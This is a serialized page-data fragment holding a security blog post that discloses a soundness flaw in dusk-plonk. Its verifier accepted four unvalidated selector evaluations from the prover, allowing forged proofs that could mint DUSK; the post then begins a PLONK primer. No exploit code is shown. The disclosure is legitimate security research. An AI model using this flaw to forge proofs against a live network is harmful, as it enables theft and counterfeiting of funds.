{"className":147815},[],[147817],{"type":33,"value":9403},{"type":33,"value":9405},{"type":27,"tag":36,"props":147820,"children":147821},{},[147822,147823,147828,147829,147834,147835,147840,147841,147846,147847,147852,147853,147858,147859,147864,147865,147870,147871,147876,147877,147882],{"type":33,"value":9410},{"type":27,"tag":84,"props":147824,"children":147826},{"className":147825},[],[147827],{"type":33,"value":8932},{"type":33,"value":9417},{"type":27,"tag":84,"props":147830,"children":147832},{"className":147831},[],[147833],{"type":33,"value":9423},{"type":33,"value":9425},{"type":27,"tag":84,"props":147836,"children":147838},{"className":147837},[],[147839],{"type":33,"value":8932},{"type":33,"value":9432},{"type":27,"tag":84,"props":147842,"children":147844},{"className":147843},[],[147845],{"type":33,"value":8863},{"type":33,"value":9439},{"type":27,"tag":84,"props":147848,"children":147850},{"className":147849},[],[147851],{"type":33,"value":9445},{"type":33,"value":9447},{"type":27,"tag":84,"props":147854,"children":147856},{"className":147855},[],[147857],{"type":33,"value":9453},{"type":33,"value":9455},{"type":27,"tag":84,"props":147860,"children":147862},{"className":147861},[],[147863],{"type":33,"value":8932},{"type":33,"value":9462},{"type":27,"tag":84,"props":147866,"children":147868},{"className":147867},[],[147869],{"type":33,"value":9468},{"type":33,"value":9470},{"type":27,"tag":84,"props":147872,"children":147874},{"className":147873},[],[147875],{"type":33,"value":9476},{"type":33,"value":9478},{"type":27,"tag":84,"props":147878,"children":147880},{"className":147879},[],[147881],{"type":33,"value":9468},{"type":33,"value":9485},{"type":27,"tag":36,"props":147884,"children":147885},{},[147886],{"type":33,"value":9490},{"type":27,"tag":101,"props":147888,"children":147889},{"code":9493,"language":7727,"meta":7,"className":7728,"style":7},[147890],{"type":27,"tag":84,"props":147891,"children":147892},{"__ignoreMap":7},[147893,147900,147907,147914,147921,147928,147935,147942,147949,147956,147963,147970,147977,147984,147991,147998,148005,148012,148019,148026,148033,148040,148047,148054,148061,148068,148075,148082,148089,148096,148103,148110,148117,148124,148131,148138,148145,148152,148159,148166,148173,148180,148187,148194,148201,148208,148215,148222,148229,148236,148243,148250,148257,148264,148271,148278,148285,148292,148299,148306,148313,148320,148327,148334,148341,148348,148355,148362,148369,148376,148383,148390,148397],{"type":27,"tag":207,"props":147894,"children":147895},{"class":209,"line":210},[147896],{"type":27,"tag":207,"props":147897,"children":147898},{},[147899],{"type":33,"value":9505},{"type":27,"tag":207,"props":147901,"children":147902},{"class":209,"line":244},[147903],{"type":27,"tag":207,"props":147904,"children":147905},{},[147906],{"type":33,"value":9513},{"type":27,"tag":207,"props":147908,"children":147909},{"class":209,"line":270},[147910],{"type":27,"tag":207,"props":147911,"children":147912},{},[147913],{"type":33,"value":9521},{"type":27,"tag":207,"props":147915,"children":147916},{"class":209,"line":296},[147917],{"type":27,"tag":207,"props":147918,"children":147919},{},[147920],{"type":33,"value":9529},{"type":27,"tag":207,"props":147922,"children":147923},{"class":209,"line":445},[147924],{"type":27,"tag":207,"props":147925,"children":147926},{},[147927],{"type":33,"value":9537},{"type":27,"tag":207,"props":147929,"children":147930},{"class":209,"line":867},[147931],{"type":27,"tag":207,"props":147932,"children":147933},{},[147934],{"type":33,"value":9545},{"type":27,"tag":207,"props":147936,"children":147937},{"class":209,"line":892},[147938],{"type":27,"tag":207,"props":147939,"children":147940},{},[147941],{"type":33,"value":9553},{"type":27,"tag":207,"props":147943,"children":147944},{"class":209,"line":1475},[147945],{"type":27,"tag":207,"props":147946,"children":147947},{},[147948],{"type":33,"value":9561},{"type":27,"tag":207,"props":147950,"children":147951},{"class":209,"line":2065},[147952],{"type":27,"tag":207,"props":147953,"children":147954},{},[147955],{"type":33,"value":9569},{"type":27,"tag":207,"props":147957,"children":147958},{"class":209,"line":2092},[147959],{"type":27,"tag":207,"props":147960,"children":147961},{},[147962],{"type":33,"value":9577},{"type":27,"tag":207,"props":147964,"children":147965},{"class":209,"line":2130},[147966],{"type":27,"tag":207,"props":147967,"children":147968},{},[147969],{"type":33,"value":9585},{"type":27,"tag":207,"props":147971,"children":147972},{"class":209,"line":2168},[147973],{"type":27,"tag":207,"props":147974,"children":147975},{},[147976],{"type":33,"value":9593},{"type":27,"tag":207,"props":147978,"children":147979},{"class":209,"line":4095},[147980],{"type":27,"tag":207,"props":147981,"children":147982},{"emptyLinePlaceholder":19},[147983],{"type":33,"value":2062},{"type":27,"tag":207,"props":147985,"children":147986},{"class":209,"line":4103},[147987],{"type":27,"tag":207,"props":147988,"children":147989},{},[147990],{"type":33,"value":9608},{"type":27,"tag":207,"props":147992,"children":147993},{"class":209,"line":4154},[147994],{"type":27,"tag":207,"props":147995,"children":147996},{},[147997],{"type":33,"value":9616},{"type":27,"tag":207,"props":147999,"children":148000},{"class":209,"line":4203},[148001],{"type":27,"tag":207,"props":148002,"children":148003},{},[148004],{"type":33,"value":9624},{"type":27,"tag":207,"props":148006,"children":148007},{"class":209,"line":4249},[148008],{"type":27,"tag":207,"props":148009,"children":148010},{},[148011],{"type":33,"value":9632},{"type":27,"tag":207,"props":148013,"children":148014},{"class":209,"line":4290},[148015],{"type":27,"tag":207,"props":148016,"children":148017},{"emptyLinePlaceholder":19},[148018],{"type":33,"value":2062},{"type":27,"tag":207,"props":148020,"children":148021},{"class":209,"line":4304},[148022],{"type":27,"tag":207,"props":148023,"children":148024},{},[148025],{"type":33,"value":9647},{"type":27,"tag":207,"props":148027,"children":148028},{"class":209,"line":5466},[148029],{"type":27,"tag":207,"props":148030,"children":148031},{},[148032],{"type":33,"value":7949},{"type":27,"tag":207,"props":148034,"children":148035},{"class":209,"line":5530},[148036],{"type":27,"tag":207,"props":148037,"children":148038},{},[148039],{"type":33,"value":9662},{"type":27,"tag":207,"props":148041,"children":148042},{"class":209,"line":7900},[148043],{"type":27,"tag":207,"props":148044,"children":148045},{},[148046],{"type":33,"value":9670},{"type":27,"tag":207,"props":148048,"children":148049},{"class":209,"line":7909},[148050],{"type":27,"tag":207,"props":148051,"children":148052},{},[148053],{"type":33,"value":7975},{"type":27,"tag":207,"props":148055,"children":148056},{"class":209,"line":7917},[148057],{"type":27,"tag":207,"props":148058,"children":148059},{},[148060],{"type":33,"value":7984},{"type":27,"tag":207,"props":148062,"children":148063},{"class":209,"line":7926},[148064],{"type":27,"tag":207,"props":148065,"children":148066},{},[148067],{"type":33,"value":7993},{"type":27,"tag":207,"props":148069,"children":148070},{"class":209,"line":7934},[148071],{"type":27,"tag":207,"props":148072,"children":148073},{},[148074],{"type":33,"value":8002},{"type":27,"tag":207,"props":148076,"children":148077},{"class":209,"line":7943},[148078],{"type":27,"tag":207,"props":148079,"children":148080},{},[148081],{"type":33,"value":7906},{"type":27,"tag":207,"props":148083,"children":148084},{"class":209,"line":7952},[148085],{"type":27,"tag":207,"props":148086,"children":148087},{"emptyLinePlaceholder":19},[148088],{"type":33,"value":2062},{"type":27,"tag":207,"props":148090,"children":148091},{"class":209,"line":7961},[148092],{"type":27,"tag":207,"props":148093,"children":148094},{},[148095],{"type":33,"value":9720},{"type":27,"tag":207,"props":148097,"children":148098},{"class":209,"line":7969},[148099],{"type":27,"tag":207,"props":148100,"children":148101},{},[148102],{"type":33,"value":9728},{"type":27,"tag":207,"props":148104,"children":148105},{"class":209,"line":7978},[148106],{"type":27,"tag":207,"props":148107,"children":148108},{"emptyLinePlaceholder":19},[148109],{"type":33,"value":2062},{"type":27,"tag":207,"props":148111,"children":148112},{"class":209,"line":7987},[148113],{"type":27,"tag":207,"props":148114,"children":148115},{},[148116],{"type":33,"value":9743},{"type":27,"tag":207,"props":148118,"children":148119},{"class":209,"line":7996},[148120],{"type":27,"tag":207,"props":148121,"children":148122},{},[148123],{"type":33,"value":9751},{"type":27,"tag":207,"props":148125,"children":148126},{"class":209,"line":8005},[148127],{"type":27,"tag":207,"props":148128,"children":148129},{"emptyLinePlaceholder":19},[148130],{"type":33,"value":2062},{"type":27,"tag":207,"props":148132,"children":148133},{"class":209,"line":8013},[148134],{"type":27,"tag":207,"props":148135,"children":148136},{},[148137],{"type":33,"value":9766},{"type":27,"tag":207,"props":148139,"children":148140},{"class":209,"line":8021},[148141],{"type":27,"tag":207,"props":148142,"children":148143},{},[148144],{"type":33,"value":9774},{"type":27,"tag":207,"props":148146,"children":148147},{"class":209,"line":8029},[148148],{"type":27,"tag":207,"props":148149,"children":148150},{"emptyLinePlaceholder":19},[148151],{"type":33,"value":2062},{"type":27,"tag":207,"props":148153,"children":148154},{"class":209,"line":8037},[148155],{"type":27,"tag":207,"props":148156,"children":148157},{},[148158],{"type":33,"value":8043},{"type":27,"tag":207,"props":148160,"children":148161},{"class":209,"line":8046},[148162],{"type":27,"tag":207,"props":148163,"children":148164},{},[148165],{"type":33,"value":9796},{"type":27,"tag":207,"props":148167,"children":148168},{"class":209,"line":8055},[148169],{"type":27,"tag":207,"props":148170,"children":148171},{},[148172],{"type":33,"value":9804},{"type":27,"tag":207,"props":148174,"children":148175},{"class":209,"line":8064},[148176],{"type":27,"tag":207,"props":148177,"children":148178},{},[148179],{"type":33,"value":9812},{"type":27,"tag":207,"props":148181,"children":148182},{"class":209,"line":8072},[148183],{"type":27,"tag":207,"props":148184,"children":148185},{"emptyLinePlaceholder":19},[148186],{"type":33,"value":2062},{"type":27,"tag":207,"props":148188,"children":148189},{"class":209,"line":8081},[148190],{"type":27,"tag":207,"props":148191,"children":148192},{},[148193],{"type":33,"value":9827},{"type":27,"tag":207,"props":148195,"children":148196},{"class":209,"line":8090},[148197],{"type":27,"tag":207,"props":148198,"children":148199},{},[148200],{"type":33,"value":9835},{"type":27,"tag":207,"props":148202,"children":148203},{"class":209,"line":8098},[148204],{"type":27,"tag":207,"props":148205,"children":148206},{},[148207],{"type":33,"value":9843},{"type":27,"tag":207,"props":148209,"children":148210},{"class":209,"line":8107},[148211],{"type":27,"tag":207,"props":148212,"children":148213},{},[148214],{"type":33,"value":9851},{"type":27,"tag":207,"props":148216,"children":148217},{"class":209,"line":8116},[148218],{"type":27,"tag":207,"props":148219,"children":148220},{},[148221],{"type":33,"value":9859},{"type":27,"tag":207,"props":148223,"children":148224},{"class":209,"line":8125},[148225],{"type":27,"tag":207,"props":148226,"children":148227},{},[148228],{"type":33,"value":9867},{"type":27,"tag":207,"props":148230,"children":148231},{"class":209,"line":8133},[148232],{"type":27,"tag":207,"props":148233,"children":148234},{},[148235],{"type":33,"value":9875},{"type":27,"tag":207,"props":148237,"children":148238},{"class":209,"line":8142},[148239],{"type":27,"tag":207,"props":148240,"children":148241},{},[148242],{"type":33,"value":9883},{"type":27,"tag":207,"props":148244,"children":148245},{"class":209,"line":8151},[148246],{"type":27,"tag":207,"props":148247,"children":148248},{},[148249],{"type":33,"value":9891},{"type":27,"tag":207,"props":148251,"children":148252},{"class":209,"line":8160},[148253],{"type":27,"tag":207,"props":148254,"children":148255},{},[148256],{"type":33,"value":9899},{"type":27,"tag":207,"props":148258,"children":148259},{"class":209,"line":8169},[148260],{"type":27,"tag":207,"props":148261,"children":148262},{},[148263],{"type":33,"value":9907},{"type":27,"tag":207,"props":148265,"children":148266},{"class":209,"line":8177},[148267],{"type":27,"tag":207,"props":148268,"children":148269},{"emptyLinePlaceholder":19},[148270],{"type":33,"value":2062},{"type":27,"tag":207,"props":148272,"children":148273},{"class":209,"line":8185},[148274],{"type":27,"tag":207,"props":148275,"children":148276},{},[148277],{"type":33,"value":9922},{"type":27,"tag":207,"props":148279,"children":148280},{"class":209,"line":8194},[148281],{"type":27,"tag":207,"props":148282,"children":148283},{},[148284],{"type":33,"value":9930},{"type":27,"tag":207,"props":148286,"children":148287},{"class":209,"line":9933},[148288],{"type":27,"tag":207,"props":148289,"children":148290},{"emptyLinePlaceholder":19},[148291],{"type":33,"value":2062},{"type":27,"tag":207,"props":148293,"children":148294},{"class":209,"line":9941},[148295],{"type":27,"tag":207,"props":148296,"children":148297},{},[148298],{"type":33,"value":9947},{"type":27,"tag":207,"props":148300,"children":148301},{"class":209,"line":9950},[148302],{"type":27,"tag":207,"props":148303,"children":148304},{},[148305],{"type":33,"value":9956},{"type":27,"tag":207,"props":148307,"children":148308},{"class":209,"line":9959},[148309],{"type":27,"tag":207,"props":148310,"children":148311},{},[148312],{"type":33,"value":9965},{"type":27,"tag":207,"props":148314,"children":148315},{"class":209,"line":9968},[148316],{"type":27,"tag":207,"props":148317,"children":148318},{},[148319],{"type":33,"value":9974},{"type":27,"tag":207,"props":148321,"children":148322},{"class":209,"line":9977},[148323],{"type":27,"tag":207,"props":148324,"children":148325},{"emptyLinePlaceholder":19},[148326],{"type":33,"value":2062},{"type":27,"tag":207,"props":148328,"children":148329},{"class":209,"line":9985},[148330],{"type":27,"tag":207,"props":148331,"children":148332},{},[148333],{"type":33,"value":9991},{"type":27,"tag":207,"props":148335,"children":148336},{"class":209,"line":9994},[148337],{"type":27,"tag":207,"props":148338,"children":148339},{},[148340],{"type":33,"value":9835},{"type":27,"tag":207,"props":148342,"children":148343},{"class":209,"line":10002},[148344],{"type":27,"tag":207,"props":148345,"children":148346},{},[148347],{"type":33,"value":9843},{"type":27,"tag":207,"props":148349,"children":148350},{"class":209,"line":10010},[148351],{"type":27,"tag":207,"props":148352,"children":148353},{},[148354],{"type":33,"value":10016},{"type":27,"tag":207,"props":148356,"children":148357},{"class":209,"line":10019},[148358],{"type":27,"tag":207,"props":148359,"children":148360},{},[148361],{"type":33,"value":10025},{"type":27,"tag":207,"props":148363,"children":148364},{"class":209,"line":10028},[148365],{"type":27,"tag":207,"props":148366,"children":148367},{},[148368],{"type":33,"value":10034},{"type":27,"tag":207,"props":148370,"children":148371},{"class":209,"line":10037},[148372],{"type":27,"tag":207,"props":148373,"children":148374},{},[148375],{"type":33,"value":9875},{"type":27,"tag":207,"props":148377,"children":148378},{"class":209,"line":10045},[148379],{"type":27,"tag":207,"props":148380,"children":148381},{},[148382],{"type":33,"value":10051},{"type":27,"tag":207,"props":148384,"children":148385},{"class":209,"line":10054},[148386],{"type":27,"tag":207,"props":148387,"children":148388},{},[148389],{"type":33,"value":10060},{"type":27,"tag":207,"props":148391,"children":148392},{"class":209,"line":10063},[148393],{"type":27,"tag":207,"props":148394,"children":148395},{"emptyLinePlaceholder":19},[148396],{"type":33,"value":2062},{"type":27,"tag":207,"props":148398,"children":148399},{"class":209,"line":10071},[148400],{"type":27,"tag":207,"props":148401,"children":148402},{},[148403],{"type":33,"value":9561},{"type":27,"tag":58,"props":148405,"children":148406},{"id":10079},[148407],{"type":33,"value":10082},{"type":27,"tag":36,"props":148409,"children":148410},{},[148411,148412,148417],{"type":33,"value":10087},{"type":27,"tag":84,"props":148413,"children":148415},{"className":148414},[],[148416],{"type":33,"value":10093},{"type":33,"value":1041},{"type":27,"tag":10096,"props":148419,"children":148421},{"className":148420,"controls":19},[10099],[148422,148423,148426],{"type":33,"value":10102},{"type":27,"tag":9321,"props":148424,"children":148425},{"src":10105,"type":10106},[],{"type":33,"value":10109},{"type":27,"tag":28,"props":148428,"children":148429},{"id":10112},[148430],{"type":33,"value":10115},{"type":27,"tag":36,"props":148432,"children":148433},{},[148434],{"type":33,"value":10120},{"type":27,"tag":36,"props":148436,"children":148437},{},[148438],{"type":33,"value":10125},{"type":27,"tag":10127,"props":148440,"children":148441},{},[148442],{"type":33,"value":10131},{"title":7,"searchDepth":244,"depth":244,"links":148444},[148445,148449,148452,148462],{"id":30,"depth":244,"text":34,"children":148446},[148447,148448],{"id":60,"depth":270,"text":63},{"id":146,"depth":270,"text":149},{"id":179,"depth":244,"text":182,"children":148450},[148451],{"id":340,"depth":270,"text":174},{"id":494,"depth":244,"text":497,"children":148453},[148454,148455,148456,148457,148458,148459,148460,148461],{"id":500,"depth":270,"text":503},{"id":964,"depth":270,"text":967},{"id":1157,"depth":270,"text":1160},{"id":1270,"depth":270,"text":1273},{"id":1558,"depth":270,"text":1561},{"id":4326,"depth":270,"text":4329},{"id":7623,"depth":270,"text":7626},{"id":10079,"depth":270,"text":10082},{"id":10112,"depth":244,"text":10115},{"_path":148464,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":148465,"description":148466,"date":148467,"author":148468,"image":148469,"isFeatured":19,"onBlogPage":19,"tags":148471,"body":148474,"_type":10152,"_id":153738,"_source":10154,"_file":153739,"_stem":153740,"_extension":10157},"/blog/2026-04-30-unverified-evaluations-dusk-plonk","Unverified Evaluations in Dusk's PLONK","Dusk's privacy layer protects ~$60M of DUSK and hinges on one proof check. dusk-plonk's verifier never validated four of the prover's polynomial commitments, enough to mint DUSK from nothing and forge shielded spends the network confirmed as real.","2026-04-30T12:00:00.000Z",[115042,115043],{"src":148470,"width":17,"height":18},"/posts/dusk-commitment-issues/title.png",[148472,148473],"dusk","plonk",{"type":24,"children":148475,"toc":153718},[148476,148482,148523,148535,148541,148555,148560,148566,148857,148861,149133,149363,149369,150054,150058,150553,150561,150567,150586,150591,150597,150822,150861,150872,150878,150889,151597,151602,151605,151611,151664,151699,151731,151736,151740,151743,151749,151760,151773,151804,151871,151879,151901,151914,152341,152364,152369,152372,152377,152404,152500,152511,152558,152596,152607,152945,152962,152970,152973,152979,152984,153018,153026,153107,153110,153116,153130,153148,153153,153193,153201,153222,153225,153231,153236,153301,153315,153318,153324,153364,153375,153380,153385,153391,153405,153486,153507,153534,153537,153543,153557,153562,153567,153572,153707,153713],{"type":27,"tag":42626,"props":148477,"children":148479},{"id":148478},"commitment-issues-unverified-evaluations-in-dusks-plonk",[148480],{"type":33,"value":148481},"Commitment Issues: Unverified Evaluations in Dusk's PLONK",{"type":27,"tag":36,"props":148483,"children":148484},{},[148485,148487,148494,148496,148503,148505,148512,148514,148521],{"type":33,"value":148486},"We found a critical soundness vulnerability in ",{"type":27,"tag":47,"props":148488,"children":148491},{"href":148489,"rel":148490},"https://github.com/dusk-network/plonk/",[51],[148492],{"type":33,"value":148493},"dusk-plonk",{"type":33,"value":148495},", the PLONK implementation powering ",{"type":27,"tag":47,"props":148497,"children":148500},{"href":148498,"rel":148499},"https://dusk.network/",[51],[148501],{"type":33,"value":148502},"Dusk Network's",{"type":33,"value":148504}," ~$60M ",{"type":27,"tag":47,"props":148506,"children":148509},{"href":148507,"rel":148508},"https://www.coingecko.com/en/coins/dusk",[51],[148510],{"type":33,"value":148511},"market cap",{"type":33,"value":148513},". By exploiting a gap in the verification step, a malicious prover could forge verifying proofs for arbitrary false statements, bypassing every constraint in the transaction circuit. On the live ",{"type":27,"tag":47,"props":148515,"children":148518},{"href":148516,"rel":148517},"https://github.com/dusk-network/rusk",[51],[148519],{"type":33,"value":148520},"Rusk",{"type":33,"value":148522}," network, this would have enabled minting arbitrary amounts of DUSK and moving forged shielded funds through the normal Phoenix path.",{"type":27,"tag":36,"props":148524,"children":148525},{},[148526,148528,148533],{"type":33,"value":148527},"The root cause was that the prover slipped four public selector evaluations into the proof struct, and the verifier consumed them in its final equation ",{"type":27,"tag":12606,"props":148529,"children":148530},{},[148531],{"type":33,"value":148532},"without ever validating them against the trusted commitments in the verifier key.",{"type":33,"value":148534}," The prover can set them to whatever values make the equation pass.",{"type":27,"tag":28,"props":148536,"children":148538},{"id":148537},"how-plonk-works-briefly",[148539],{"type":33,"value":148540},"How PLONK works (briefly)",{"type":27,"tag":36,"props":148542,"children":148543},{},[148544,148546,148553],{"type":33,"value":148545},"For a rigorous treatment see the ",{"type":27,"tag":47,"props":148547,"children":148550},{"href":148548,"rel":148549},"https://eprint.iacr.org/2019/953",[51],[148551],{"type":33,"value":148552},"original paper",{"type":33,"value":148554},"; what follows covers only the parts needed to understand the bug.",{"type":27,"tag":36,"props":148556,"children":148557},{},[148558],{"type":33,"value":148559},"A prover wants to convince a verifier that it knows secret inputs satisfying some computation (an arithmetic circuit) without revealing those inputs, and the resulting proof should be short and quick to verify.",{"type":27,"tag":58,"props":148561,"children":148563},{"id":148562},"arithmetic-circuits-and-constraints",[148564],{"type":33,"value":148565},"Arithmetic circuits and constraints",{"type":27,"tag":36,"props":148567,"children":148568},{},[148569,148571,148620,148622,148771,148773,148856],{"type":33,"value":148570},"An arithmetic circuit is a series of addition and multiplication gates wired together. An example would be proving that we know of some point ",{"type":27,"tag":84,"props":148572,"children":148574},{"className":148573},[11266,11267],[148575],{"type":27,"tag":207,"props":148576,"children":148578},{"className":148577},[11272],[148579],{"type":27,"tag":207,"props":148580,"children":148582},{"className":148581,"ariaHidden":11278},[11277],[148583],{"type":27,"tag":207,"props":148584,"children":148586},{"className":148585},[11283],[148587,148591,148596,148601,148606,148610,148615],{"type":27,"tag":207,"props":148588,"children":148590},{"className":148589,"style":11393},[11288],[],{"type":27,"tag":207,"props":148592,"children":148594},{"className":148593},[28989],[148595],{"type":33,"value":1343},{"type":27,"tag":207,"props":148597,"children":148599},{"className":148598},[11294,28860],[148600],{"type":33,"value":26546},{"type":27,"tag":207,"props":148602,"children":148604},{"className":148603},[11404],[148605],{"type":33,"value":11407},{"type":27,"tag":207,"props":148607,"children":148609},{"className":148608,"style":11411},[11372],[],{"type":27,"tag":207,"props":148611,"children":148613},{"className":148612,"style":100750},[11294,28860],[148614],{"type":33,"value":10403},{"type":27,"tag":207,"props":148616,"children":148618},{"className":148617},[29011],[148619],{"type":33,"value":10416},{"type":33,"value":148621}," on an elliptic curve, by e.g proving that ",{"type":27,"tag":84,"props":148623,"children":148625},{"className":148624},[11266,11267],[148626],{"type":27,"tag":207,"props":148627,"children":148629},{"className":148628},[11272],[148630],{"type":27,"tag":207,"props":148631,"children":148633},{"className":148632,"ariaHidden":11278},[11277],[148634,148696,148758],{"type":27,"tag":207,"props":148635,"children":148637},{"className":148636},[11283],[148638,148642,148683,148687,148692],{"type":27,"tag":207,"props":148639,"children":148641},{"className":148640,"style":130587},[11288],[],{"type":27,"tag":207,"props":148643,"children":148645},{"className":148644},[11294],[148646,148651],{"type":27,"tag":207,"props":148647,"children":148649},{"className":148648,"style":100750},[11294,28860],[148650],{"type":33,"value":10403},{"type":27,"tag":207,"props":148652,"children":148654},{"className":148653},[11309],[148655],{"type":27,"tag":207,"props":148656,"children":148658},{"className":148657},[11314],[148659],{"type":27,"tag":207,"props":148660,"children":148662},{"className":148661},[11319],[148663],{"type":27,"tag":207,"props":148664,"children":148666},{"className":148665,"style":11289},[11324],[148667],{"type":27,"tag":207,"props":148668,"children":148669},{"style":11328},[148670,148674],{"type":27,"tag":207,"props":148671,"children":148673},{"className":148672,"style":11334},[11333],[],{"type":27,"tag":207,"props":148675,"children":148677},{"className":148676},[11339,11340,11341,11342],[148678],{"type":27,"tag":207,"props":148679,"children":148681},{"className":148680},[11294,11342],[148682],{"type":33,"value":1744},{"type":27,"tag":207,"props":148684,"children":148686},{"className":148685,"style":11470},[11372],[],{"type":27,"tag":207,"props":148688,"children":148690},{"className":148689},[11475],[148691],{"type":33,"value":10380},{"type":27,"tag":207,"props":148693,"children":148695},{"className":148694,"style":11470},[11372],[],{"type":27,"tag":207,"props":148697,"children":148699},{"className":148698},[11283],[148700,148704,148745,148749,148754],{"type":27,"tag":207,"props":148701,"children":148703},{"className":148702,"style":130462},[11288],[],{"type":27,"tag":207,"props":148705,"children":148707},{"className":148706},[11294],[148708,148713],{"type":27,"tag":207,"props":148709,"children":148711},{"className":148710},[11294,28860],[148712],{"type":33,"value":26546},{"type":27,"tag":207,"props":148714,"children":148716},{"className":148715},[11309],[148717],{"type":27,"tag":207,"props":148718,"children":148720},{"className":148719},[11314],[148721],{"type":27,"tag":207,"props":148722,"children":148724},{"className":148723},[11319],[148725],{"type":27,"tag":207,"props":148726,"children":148728},{"className":148727,"style":11289},[11324],[148729],{"type":27,"tag":207,"props":148730,"children":148731},{"style":11328},[148732,148736],{"type":27,"tag":207,"props":148733,"children":148735},{"className":148734,"style":11334},[11333],[],{"type":27,"tag":207,"props":148737,"children":148739},{"className":148738},[11339,11340,11341,11342],[148740],{"type":27,"tag":207,"props":148741,"children":148743},{"className":148742},[11294,11342],[148744],{"type":33,"value":1735},{"type":27,"tag":207,"props":148746,"children":148748},{"className":148747,"style":11373},[11372],[],{"type":27,"tag":207,"props":148750,"children":148752},{"className":148751},[11378],[148753],{"type":33,"value":2227},{"type":27,"tag":207,"props":148755,"children":148757},{"className":148756,"style":11373},[11372],[],{"type":27,"tag":207,"props":148759,"children":148761},{"className":148760},[11283],[148762,148766],{"type":27,"tag":207,"props":148763,"children":148765},{"className":148764,"style":101295},[11288],[],{"type":27,"tag":207,"props":148767,"children":148769},{"className":148768},[11294],[148770],{"type":33,"value":1769},{"type":33,"value":148772},", here in ",{"type":27,"tag":84,"props":148774,"children":148776},{"className":148775},[11266,11267],[148777],{"type":27,"tag":207,"props":148778,"children":148780},{"className":148779},[11272],[148781],{"type":27,"tag":207,"props":148782,"children":148784},{"className":148783,"ariaHidden":11278},[11277],[148785],{"type":27,"tag":207,"props":148786,"children":148788},{"className":148787},[11283],[148789,148794],{"type":27,"tag":207,"props":148790,"children":148793},{"className":148791,"style":148792},[11288],"height:0.8389em;vertical-align:-0.15em;",[],{"type":27,"tag":207,"props":148795,"children":148797},{"className":148796},[11294],[148798,148803],{"type":27,"tag":207,"props":148799,"children":148801},{"className":148800},[11294,129025],[148802],{"type":33,"value":129028},{"type":27,"tag":207,"props":148804,"children":148806},{"className":148805},[11309],[148807],{"type":27,"tag":207,"props":148808,"children":148810},{"className":148809},[11314,28914],[148811,148845],{"type":27,"tag":207,"props":148812,"children":148814},{"className":148813},[11319],[148815,148840],{"type":27,"tag":207,"props":148816,"children":148818},{"className":148817,"style":100316},[11324],[148819],{"type":27,"tag":207,"props":148820,"children":148821},{"style":100320},[148822,148826],{"type":27,"tag":207,"props":148823,"children":148825},{"className":148824,"style":11334},[11333],[],{"type":27,"tag":207,"props":148827,"children":148829},{"className":148828},[11339,11340,11341,11342],[148830],{"type":27,"tag":207,"props":148831,"children":148833},{"className":148832},[11294,11342],[148834],{"type":27,"tag":207,"props":148835,"children":148837},{"className":148836},[11294,11342],[148838],{"type":33,"value":148839},"37",{"type":27,"tag":207,"props":148841,"children":148843},{"className":148842},[29017],[148844],{"type":33,"value":29020},{"type":27,"tag":207,"props":148846,"children":148848},{"className":148847},[11319],[148849],{"type":27,"tag":207,"props":148850,"children":148852},{"className":148851,"style":100347},[11324],[148853],{"type":27,"tag":207,"props":148854,"children":148855},{},[],{"type":33,"value":1041},{"type":27,"tag":148858,"props":148859,"children":148860},"arithmetic-circuit-widget",{},[],{"type":27,"tag":36,"props":148862,"children":148863},{},[148864,148866,148892,148894,148973,148975,149052,149054,149131],{"type":33,"value":148865},"Each gate ",{"type":27,"tag":84,"props":148867,"children":148869},{"className":148868},[11266,11267],[148870],{"type":27,"tag":207,"props":148871,"children":148873},{"className":148872},[11272],[148874],{"type":27,"tag":207,"props":148875,"children":148877},{"className":148876,"ariaHidden":11278},[11277],[148878],{"type":27,"tag":207,"props":148879,"children":148881},{"className":148880},[11283],[148882,148887],{"type":27,"tag":207,"props":148883,"children":148886},{"className":148884,"style":148885},[11288],"height:0.6595em;",[],{"type":27,"tag":207,"props":148888,"children":148890},{"className":148889},[11294,28860],[148891],{"type":33,"value":4690},{"type":33,"value":148893}," has a left input ",{"type":27,"tag":84,"props":148895,"children":148897},{"className":148896},[11266,11267],[148898],{"type":27,"tag":207,"props":148899,"children":148901},{"className":148900},[11272],[148902],{"type":27,"tag":207,"props":148903,"children":148905},{"className":148904,"ariaHidden":11278},[11277],[148906],{"type":27,"tag":207,"props":148907,"children":148909},{"className":148908},[11283],[148910,148915],{"type":27,"tag":207,"props":148911,"children":148914},{"className":148912,"style":148913},[11288],"height:0.8444em;vertical-align:-0.15em;",[],{"type":27,"tag":207,"props":148916,"children":148918},{"className":148917},[11294],[148919,148924],{"type":27,"tag":207,"props":148920,"children":148922},{"className":148921,"style":100276},[11294,28860],[148923],{"type":33,"value":100279},{"type":27,"tag":207,"props":148925,"children":148927},{"className":148926},[11309],[148928],{"type":27,"tag":207,"props":148929,"children":148931},{"className":148930},[11314,28914],[148932,148962],{"type":27,"tag":207,"props":148933,"children":148935},{"className":148934},[11319],[148936,148957],{"type":27,"tag":207,"props":148937,"children":148939},{"className":148938,"style":100793},[11324],[148940],{"type":27,"tag":207,"props":148941,"children":148943},{"style":148942},"top:-2.55em;margin-left:-0.0197em;margin-right:0.05em;",[148944,148948],{"type":27,"tag":207,"props":148945,"children":148947},{"className":148946,"style":11334},[11333],[],{"type":27,"tag":207,"props":148949,"children":148951},{"className":148950},[11339,11340,11341,11342],[148952],{"type":27,"tag":207,"props":148953,"children":148955},{"className":148954},[11294,28860,11342],[148956],{"type":33,"value":4690},{"type":27,"tag":207,"props":148958,"children":148960},{"className":148959},[29017],[148961],{"type":33,"value":29020},{"type":27,"tag":207,"props":148963,"children":148965},{"className":148964},[11319],[148966],{"type":27,"tag":207,"props":148967,"children":148969},{"className":148968,"style":100347},[11324],[148970],{"type":27,"tag":207,"props":148971,"children":148972},{},[],{"type":33,"value":148974},", right input 